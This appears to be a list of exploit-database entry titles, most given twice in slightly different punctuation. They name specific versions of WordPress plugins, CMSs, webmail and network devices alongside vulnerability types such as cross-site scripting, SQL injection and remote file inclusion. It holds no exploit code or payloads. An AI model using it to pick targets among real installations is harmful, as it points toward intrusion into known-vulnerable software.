WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting
WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting
WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting
Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities
Hastymail2 - 'rs' Parameter Cross Site Scripting
Zen Cart CMS 1.3.9h Multiple Cross-Site Scripting Vulnerabilities
Hastymail2 - 'rs' Parameter Cross-Site Scripting
eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities
WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting
eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting
WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting
WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting
WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross-Site Scripting
WordPress flash-album-gallery Plugin 'facebook.php' Cross-Site Scripting

WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting
WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross-Site Scripting

WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross Site Scripting
WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting

Hero 3.69 - 'month' Parameter Cross Site Scripting
Hero 3.69 - 'month' Parameter Cross-Site Scripting
Siena CMS 1.242 - 'err' Parameter Cross Site Scripting
WordPress WP Live.php 1.2.1 - 's' Parameter Cross Site Scripting
PHPB2B 4.1 - 'q' Parameter Cross Site Scripting
FuseTalk Forums 3.2 - 'windowed' Parameter Cross Site Scripting
Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting
WordPress WP Live.php 1.2.1 - 's' Parameter Cross-Site Scripting
PHPB2B 4.1 - 'q' Parameter Cross-Site Scripting
FuseTalk Forums 3.2 - 'windowed' Parameter Cross-Site Scripting

Axis M10 Series Network Cameras Cross Site Scripting
Axis M10 Series Network Cameras Cross-Site Scripting

Pet Listing 'preview.php' Cross Site Scripting
Pet Listing 'preview.php' Cross-Site Scripting

WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross Site Scripting
WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting
WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting
WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross Site Scripting
Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities
Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities
WordPress flash-album-gallery Plugin 'flagshow.php' Cross-Site Scripting
WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting
Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities
Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities

BrowserCRM 5.100.1 Multiple Script URI XSS
BrowserCRM 5.100.1 - Multiple Script URI XSS

Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Websense 7.6 Triton Report Management Interface Cross Site Scripting
Websense 7.6 Triton Report Management Interface Cross-Site Scripting

PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting
PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting

PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection
PHPShop CMS 3.4 - Multiple Cross-Site Scripting and SQL Injection
epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities
Barracuda Control Center 620 - Cross Site Scripting / HTML Injection
epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities
Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection
WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross Site Scripting
WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross Site Scripting
TextPattern 4.4.1 - 'ddb' Parameter Cross Site Scripting
WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting
WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting
TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting

Limny 3.0.1 - 'login.php' Script Cross Site Scripting
Limny 3.0.1 - 'login.php' Script Cross-Site Scripting
Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross Site Scripting
UBB.threads 7.5.6 'Username' Field Cross Site Scripting
Yaws 1.88 - Multiple Cross Site Scripting / HTML Injection Vulnerabilities
StatIt 4 - 'statistik.php' Multiple Cross Site Scripting Vulnerabilities
Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting
UBB.threads 7.5.6 'Username' Field Cross-Site Scripting
Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities

VertrigoServ 2.25 - 'extensions.php' Script Cross Site Scripting
VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting

DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection
DIGIT CMS 1.0.7 Cross-Site Scripting and SQL Injection
SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities
Gregarius 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Advanced File Management 1.4 - 'users.php' Cross Site Scripting
SonicWall AntiSpam & EMail 7.3.1 - Multiple Security vulnerabilities
Gregarius 0.6.1 - Multiple SQL Injection / Cross-Site Scripting
Advanced File Management 1.4 - 'users.php' Cross-Site Scripting

PHP-Fusion 7.2.4 - 'downloads.php' Cross Site Scripting
PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting

KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities
KnowledgeTree 3.x Multiple Cross-Site Scripting Vulnerabilities

MailEnable 6.02 - 'ForgottonPassword.aspx' Cross Site Scripting
MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting
PHP Membership Site Manager Script 2.1 - 'index.php' Cross Site Scripting
PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities
BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities
PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting
PHP Ringtone Website 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities
BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities
ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities
Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities
phpVideoPro 0.8.x/0.9.7 Multiple Cross Site Scripting Vulnerabilities
Giveaway Manager 'members.php' Cross Site Scripting
Annuaire PHP 'sites_inscription.php' Multiple Cross Site Scripting Vulnerabilities
ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities
Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities
phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities
Giveaway Manager 'members.php' Cross-Site Scripting
Annuaire PHP 'sites_inscription.php' Multiple Cross-Site Scripting Vulnerabilities

OneOrZero AIMS 'index.php' Cross Site Scripting
OneOrZero AIMS 'index.php' Cross-Site Scripting

Syneto Unified Threat Management 1.3.3/1.4.2 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

Acidcat ASP CMS 3.5 Multiple Cross Site Scripting Vulnerabilities
Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities

WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross Site Scripting
WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting
WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross Site Scripting
xClick Cart 1.0.x - 'shopping_url' Parameter Cross Site Scripting
WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting
xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting

Lead Capture 'login.php' Script Cross Site Scripting
Lead Capture 'login.php' Script Cross-Site Scripting
phpLDAPadmin 1.2.2 - 'base' Parameter Cross Site Scripting
phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross Site Scripting
GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities
phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting
phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting
GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities

iknSupport 'search' Module Cross Site Scripting
iknSupport 'search' Module Cross-Site Scripting

project-open 3.4.x - 'account-closed.tcl' Cross Site Scripting
project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting

Simple Groupware 0.742 - 'export' Parameter Cross Site Scripting
Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting

eFront 3.6.10 - 'administrator.php' Cross Site Scripting
eFront 3.6.10 - 'administrator.php' Cross-Site Scripting
LxCenter Kloxo 6.1.10 Multiple HTML Injection Vulnerabilities
CubeCart 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect
LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities
CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect

RabbitWiki 'title' Parameter Cross Site Scripting
RabbitWiki 'title' Parameter Cross-Site Scripting

Zimbra 'view' Parameter Cross Site Scripting
Zimbra 'view' Parameter Cross-Site Scripting
Basic Analysis and Security Engine (BASE) 1.4.5 base_db_setup.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_display.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_form.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_local_rules.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_logout.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_maintenance.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_payload.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 help/base_setup_help.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_action.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_db.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_include.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 setup/base_conf_contents.php Multiple Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - help/base_setup_help.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_action.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_db.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_include.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - setup/base_conf_contents.php Multiple Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 setup/setup2.php ado_inc_php Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_alert.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_alerts.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_class.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - setup/setup2.php ado_inc_php Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php BASE_path Parameter Remote File Inclusion

WordPress Duplicator 0.5.14 - SQL Injection & CSRF
WordPress Duplicator 0.5.14 - SQL Injection / CSRF

Linux Kernel 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS
Linux Kernel 3.13 / 3.14 (Ubuntu) - splice() System Call Local DoS
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php BASE_path Parameter Remote File Inclusion

Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution
Basic Analysis and Security Engine (BASE) 1.4.5 - index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution

ProWiki 'id' Parameter Cross Site Scripting
ProWiki 'id' Parameter Cross-Site Scripting

LEPTON 1.1.3 - Cross Site Scripting
LEPTON 1.1.3 - Cross-Site Scripting

Tube Ace - 'q' Parameter Cross Site Scripting
Tube Ace - 'q' Parameter Cross-Site Scripting

ButorWiki 3.0 - 'service' Parameter Cross Site Scripting
ButorWiki 3.0 - 'service' Parameter Cross-Site Scripting

F*EX 20100208/20111129-2 Multiple Cross Site Scripting Vulnerabilities
F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities

CPG Dragonfly CMS 9.3.3.0 Multiple Multiple Cross Site Scripting Vulnerabilities
CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities
ContentLion Alpha 1.3 - 'login.php' Cross Site Scripting
Dolibarr 3.2 Alpha Multiple Directory Traversal Vulnerabilities
ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting
Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

Oxwall 1.1.1 - 'plugin' Parameter Cross Site Scripting
Oxwall 1.1.1 - 'plugin' Parameter Cross-Site Scripting

Webglimpse 2.x Multiple Cross Site Scripting Vulnerabilities
Webglimpse 2.x Multiple Cross-Site Scripting Vulnerabilities

Bontq 'user/' URI Cross Site Scripting
Bontq 'user/' URI Cross-Site Scripting

starCMS 'q' Parameter URI Cross Site Scripting
starCMS 'q' Parameter URI Cross-Site Scripting
Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities
NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities
Fork CMS 3.2.x Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities

WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload
WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS / CSRF / File Upload

Omnistar Live Cross Site Scripting and SQL Injection
Omnistar Live Cross-Site Scripting and SQL Injection

Max's Guestbook 1.0 Multiple Remote Vulnerabilities
Max's Guestbook 1.0 - Multiple Remote Vulnerabilities

JavaBB 0.99 - 'userId' Parameter Cross Site Scripting
JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting

Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities
Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities
phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities
singapore 0.10.1 - 'gallery' Parameter Cross Site Scripting
EJBCA 4.0.7 - 'issuer' Parameter Cross Site Scripting
phpMyVisites 2.4 phpmv2/index.php Multiple Cross-Site Scripting Vulnerabilities
singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting
EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting

Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting
Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting

VFront 0.99.2 CSRF & Persistent XSS
VFront 0.99.2 - CSRF / Persistent XSS

Minify 2.1.x - 'g' Parameter Cross Site Scripting
Minify 2.1.x - 'g' Parameter Cross-Site Scripting

CMSimple 3.3 - 'index.php' Cross Site Scripting
CMSimple 3.3 - 'index.php' Cross-Site Scripting

Open Journal Systems (OJS) 2.3.6 Multiple Script Arbitrary File Upload
Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload
AtMail 1.04 Multiple Security Vulnerabilities
Event Calendar PHP 'cal_year' Parameter Cross Site Scripting
AtMail 1.04 - Multiple Security Vulnerabilities
Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting

Zumset.com FbiLike 1.00 - 'id' Parameter Cross Site Scripting
Zumset.com FbiLike 1.00 - 'id' Parameter Cross-Site Scripting
Matthew1471 BlogX Multiple Cross Site Scripting Vulnerabilities
WordPress Integrator 1.32 - 'redirect_to' Parameter Cross Site Scripting
Invision Power Board 4.2.1 - 'searchText' Parameter Cross Site Scripting
Matthew1471 BlogX Multiple Cross-Site Scripting Vulnerabilities
WordPress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting
Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting

eZ Publish 4.x - 'ezjscore' Module Cross Site Scripting
eZ Publish 4.x - 'ezjscore' Module Cross-Site Scripting

JamWiki 1.1.5 - 'num' Parameter Cross Site Scripting
JamWiki 1.1.5 - 'num' Parameter Cross-Site Scripting

JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross Site Scripting
JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting

Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross Site Scripting
Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting

Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities
Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities
WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities
CitrusDB 2.4.1 - Local File Inclusion and SQL Injection
Matterdaddy Market 1.1 Multiple SQL Injection
BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
WordPress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities
CitrusDB 2.4.1 - Local File Inclusion / SQL Injection
Matterdaddy Market 1.1 - Multiple SQL Injection
BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Forma LMS 1.3 Multiple SQL Injection
Forma LMS 1.3 - Multiple SQL Injection
Bioly 1.3 - 'index.php' Cross Site Scripting and SQL Injection
Joomla! Beatz Plugin 1.1 Multiple Cross Site Scripting Vulnerabilities
Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection
Joomla! Beatz Plugin 1.1 - Multiple Cross-Site Scripting Vulnerabilities

WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities
WordPress Yahoo Answer Plugin Multiple Cross-Site Scripting Vulnerabilities

Acuity CMS 2.6.2 - 'UserName' Parameter Cross Site Scripting
Acuity CMS 2.6.2 - 'UserName' Parameter Cross-Site Scripting

Pendulab ChatBlazer 8.5 - 'username' Parameter Cross Site Scripting
Pendulab ChatBlazer 8.5 - 'username' Parameter Cross-Site Scripting
concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross Site Scripting
gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting
Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting
concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting
gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting
Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting
Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities
SKYUC 3.2.1 - 'encode' Parameter Cross Site Scripting
Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities
SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting

WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting
WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting

MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure
MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure

iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting
iGuard Security Access Control Device Firmware 3.6.7427A Cross-Site Scripting

Ramui Forum Script 'query' Parameter Cross Site Scripting
Ramui Forum Script 'query' Parameter Cross-Site Scripting

PivotX 2.3.2 - 'ajaxhelper.php' Cross Site Scripting
PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting

WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross Site Scripting
WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting
WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross Site Scripting
Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross Site Scripting
WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting
Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting
Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross Site Scripting Vulnerabilities
WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross Site Scripting
Download Manager 2.2.2 - 'cid' Parameter Cross Site Scripting
PDF & Print Button Joliprint 1.3.0 Multiple Cross Site Scripting Vulnerabilities
CataBlog WordPress Plugin 1.6 'admin.php' Cross Site Scripting
2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities
iFrame Admin Pages 0.1 - 'main_page.php' Cross Site Scripting
WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities
Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting
Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting
PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
CataBlog WordPress Plugin 1.6 'admin.php' Cross-Site Scripting
2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
WordPress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities
Media Library Categories Multiple Cross Site Scripting Vulnerabilities
LeagueManager 3.7 Multiple Cross Site Scripting Vulnerabilities
Media Library Categories Multiple Cross-Site Scripting Vulnerabilities
LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
GD Star Rating 1.9.16 'tpl_section' Parameter Cross Site Scripting
Mingle Forum 1.0.33 - 'admin.php' Multiple Cross Site Scripting Vulnerabilities
GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting
Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross Site Scripting
Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting
WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion
WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross Site Scripting
Share and Follow 1.80.3 - 'admin.php' Cross Site Scripting
WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross Site Scripting
WordPress Track That Stat 1.0.8 Cross Site Scripting
LongTail JW Player 'debug' Parameter Cross Site Scripting
WordPress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion
WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting
Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting
WordPress Track That Stat 1.0.8 Cross-Site Scripting
LongTail JW Player 'debug' Parameter Cross-Site Scripting

backupDB() 1.2.7a 'onlyDB' Parameter Cross Site Scripting
backupDB() 1.2.7a 'onlyDB' Parameter Cross-Site Scripting
Unijimpe Captcha 'captchademo.php' Cross Site Scripting
Artiphp 5.5.0 Neo - 'index.php' Multiple Cross Site Scripting Vulnerabilities
